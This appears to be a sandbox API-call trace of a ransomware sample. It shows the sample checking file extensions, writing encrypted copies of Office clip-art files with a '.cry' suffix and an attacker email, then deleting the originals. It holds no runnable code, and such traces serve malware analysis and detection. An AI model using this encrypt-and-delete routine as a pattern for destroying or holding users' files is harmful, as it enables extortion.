lstrlenW (lpString=".1cd") returned 4 [0051.345] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0051.345] lstrlenW (lpString=".jpg") returned 4 [0051.345] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.345] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=7583) returned 1 [0051.345] CloseHandle (hObject=0x20c) returned 1 [0051.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 0x20 [0051.345] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.345] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.346] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.346] GetLastError () returned 0x0 [0051.346] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1d9f, lpOverlapped=0x0) returned 1 [0051.357] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1da0, lpOverlapped=0x0) returned 1 [0051.358] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.358] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.358] SetEndOfFile (hFile=0x1c4) returned 1 [0051.358] CloseHandle (hObject=0x1c4) returned 1 [0051.358] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.358] SetEndOfFile (hFile=0x20c) returned 1 [0051.359] CloseHandle (hObject=0x20c) returned 1 [0051.359] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.359] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0051.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0051.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0051.359] lstrlenW (lpString=".doc") returned 4 [0051.359] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.359] lstrlenW (lpString=".docx") returned 5 [0051.359] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.360] lstrlenW (lpString=".pdf") returned 4 [0051.360] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.360] lstrlenW (lpString=".xls") returned 4 [0051.360] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.360] lstrlenW (lpString=".xlsx") returned 5 [0051.360] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.360] lstrlenW (lpString=".ppt") returned 4 [0051.360] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0051.360] lstrlenW (lpString=".zip") returned 4 [0051.360] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.360] lstrlenW (lpString=".rar") returned 4 [0051.360] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.360] lstrlenW (lpString=".bz2") returned 4 [0051.360] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.360] lstrlenW (lpString=".7z") returned 3 [0051.360] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0051.360] lstrlenW (lpString=".dbf") returned 4 [0051.360] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0051.360] lstrlenW (lpString=".1cd") returned 4 [0051.360] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0051.360] lstrlenW (lpString=".jpg") returned 4 [0051.360] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.642] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.642] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0051.642] GetLastError () returned 0x0 [0051.642] ReadFile (in: hFile=0x1c0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1b48, lpOverlapped=0x0) returned 1 [0051.746] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1b50, lpOverlapped=0x0) returned 1 [0051.749] ReadFile (in: hFile=0x1c0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.749] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.749] SetEndOfFile (hFile=0x16c) returned 1 [0051.749] CloseHandle (hObject=0x16c) returned 1 [0051.749] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.750] SetEndOfFile (hFile=0x1c0) returned 1 [0051.750] CloseHandle (hObject=0x1c0) returned 1 [0051.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.751] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0051.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0051.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0051.942] lstrlenW (lpString=".doc") returned 4 [0051.942] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.942] lstrlenW (lpString=".docx") returned 5 [0051.942] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.942] lstrlenW (lpString=".pdf") returned 4 [0051.943] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.943] lstrlenW (lpString=".xls") returned 4 [0051.943] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.943] lstrlenW (lpString=".xlsx") returned 5 [0051.943] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.943] lstrlenW (lpString=".ppt") returned 4 [0051.943] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0051.943] lstrlenW (lpString=".zip") returned 4 [0051.943] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.943] lstrlenW (lpString=".rar") returned 4 [0051.943] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.943] lstrlenW (lpString=".bz2") returned 4 [0051.943] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.943] lstrlenW (lpString=".7z") returned 3 [0051.943] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0051.943] lstrlenW (lpString=".dbf") returned 4 [0051.943] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0051.943] lstrlenW (lpString=".1cd") returned 4 [0051.943] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63 [0051.943] lstrlenW (lpString=".jpg") returned 4 [0051.943] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.224] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.224] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0052.224] GetLastError () returned 0x0 [0052.224] ReadFile (in: hFile=0x228, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x385c, lpOverlapped=0x0) returned 1 [0052.377] WriteFile (in: hFile=0x1f0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x3860, lpOverlapped=0x0) returned 1 [0052.378] ReadFile (in: hFile=0x228, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.378] WriteFile (in: hFile=0x1f0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.378] SetEndOfFile (hFile=0x1f0) returned 1 [0052.379] CloseHandle (hObject=0x1f0) returned 1 [0052.379] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.379] SetEndOfFile (hFile=0x228) returned 1 [0052.379] CloseHandle (hObject=0x228) returned 1 [0052.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.380] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf")) returned 1 [0052.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0052.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0052.380] lstrlenW (lpString=".doc") returned 4 [0052.380] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.380] lstrlenW (lpString=".docx") returned 5 [0052.380] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.380] lstrlenW (lpString=".pdf") returned 4 [0052.380] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.383] lstrlenW (lpString=".xls") returned 4 [0052.383] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.383] lstrlenW (lpString=".xlsx") returned 5 [0052.383] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.383] lstrlenW (lpString=".ppt") returned 4 [0052.383] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0052.383] lstrlenW (lpString=".zip") returned 4 [0052.383] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.383] lstrlenW (lpString=".rar") returned 4 [0052.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.383] lstrlenW (lpString=".bz2") returned 4 [0052.384] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.384] lstrlenW (lpString=".7z") returned 3 [0052.384] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0052.384] lstrlenW (lpString=".dbf") returned 4 [0052.384] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0052.384] lstrlenW (lpString=".1cd") returned 4 [0052.384] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0052.384] lstrlenW (lpString=".jpg") returned 4 [0052.384] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.474] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=7968) returned 1 [0052.474] CloseHandle (hObject=0x21c) returned 1 [0052.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf")) returned 0x20 [0052.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.474] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.474] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.474] GetLastError () returned 0x0 [0052.474] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1f20, lpOverlapped=0x0) returned 1 [0052.490] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1f30, lpOverlapped=0x0) returned 1 [0052.491] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.491] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.491] SetEndOfFile (hFile=0x1c0) returned 1 [0052.630] CloseHandle (hObject=0x1c0) returned 1 [0052.630] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.630] SetEndOfFile (hFile=0x21c) returned 1 [0052.630] CloseHandle (hObject=0x21c) returned 1 [0052.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf")) returned 1 [0052.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0052.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0052.631] lstrlenW (lpString=".doc") returned 4 [0052.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.631] lstrlenW (lpString=".docx") returned 5 [0052.631] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.631] lstrlenW (lpString=".pdf") returned 4 [0052.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.631] lstrlenW (lpString=".xls") returned 4 [0052.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.631] lstrlenW (lpString=".xlsx") returned 5 [0052.631] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.631] lstrlenW (lpString=".ppt") returned 4 [0052.631] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0052.631] lstrlenW (lpString=".zip") returned 4 [0052.631] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.631] lstrlenW (lpString=".rar") returned 4 [0052.631] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.631] lstrlenW (lpString=".bz2") returned 4 [0052.631] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.632] lstrlenW (lpString=".7z") returned 3 [0052.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0052.632] lstrlenW (lpString=".dbf") returned 4 [0052.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0052.632] lstrlenW (lpString=".1cd") returned 4 [0052.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0052.632] lstrlenW (lpString=".jpg") returned 4 [0052.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.632] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=3012) returned 1 [0052.632] CloseHandle (hObject=0x21c) returned 1 [0052.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf")) returned 0x20 [0052.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.632] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.632] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.633] GetLastError () returned 0x0 [0052.633] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0xbc4, lpOverlapped=0x0) returned 1 [0052.732] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0052.733] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.733] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.733] SetEndOfFile (hFile=0x1c0) returned 1 [0052.733] CloseHandle (hObject=0x1c0) returned 1 [0052.733] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.733] SetEndOfFile (hFile=0x21c) returned 1 [0052.734] CloseHandle (hObject=0x21c) returned 1 [0052.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.734] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf")) returned 1 [0052.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0052.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0052.735] lstrlenW (lpString=".doc") returned 4 [0052.735] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.735] lstrlenW (lpString=".docx") returned 5 [0052.735] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.735] lstrlenW (lpString=".pdf") returned 4 [0052.735] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.735] lstrlenW (lpString=".xls") returned 4 [0052.735] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.735] lstrlenW (lpString=".xlsx") returned 5 [0052.735] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.735] lstrlenW (lpString=".ppt") returned 4 [0052.735] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0052.735] lstrlenW (lpString=".zip") returned 4 